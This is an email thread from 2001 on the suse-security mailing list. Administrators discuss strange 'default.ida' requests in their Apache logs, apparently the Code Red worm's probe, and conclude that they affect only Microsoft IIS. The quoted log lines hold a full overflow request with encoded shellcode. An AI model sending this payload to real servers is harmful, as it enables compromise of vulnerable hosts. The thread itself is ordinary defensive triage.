i have this default.ida requests too! but we running apache and roxen server only. what for stupid guys try this IIS exploid on apache or roxen? *rofl* tia, lars s.
-----Original Message----- From: dog@intop.net [mailto:dog@intop.net] Sent: Friday, July 20, 2001 6:08 AM To: michael.ryan@storm.ie Cc: suse-security@suse.com Subject: Re: [suse-security] Strange HTTP requests
this only affects microsoft internet information server (iis) you have nothing to worry about if you are only running apache.
On Thu, 19 Jul 2001 michael.ryan@storm.ie wrote:
... on the same thread ... are there any known
exploits/vulnerabilities for
Apache 1.3.12 running on SuSE? (The only issue I found on http://www.suse.com/us/support/security/index.html was dated 07-09-2000 and just required a minor edit to httpd.conf) should I upgrade to 1.3.19 anyway?
TIA Michael
Lars Trebing <ltrebing@ltr To: SuSE Security Mailing List <suse-security@suse.com> ebing.de> cc: Subject: [suse-security] Strange HTTP requests 07/19/2001 07:46 PM
Hello everyone,
My Apache has just got three strange requests from three different addresses:
63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090% u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 315 209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090% u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 315 161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090% u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 315
Might this perhaps be an attack for a known bug of some HTTP server? Should I maybe even worry about this? (I am running Apache 1.3.12).
By the way, I performed the same request locally and got a 404 error instead of the 400s reported in the log.
TIA, Lars
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
Chad Whitten Network/Systems Administrator Nexband Communications chadwick@nexband.com
-- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com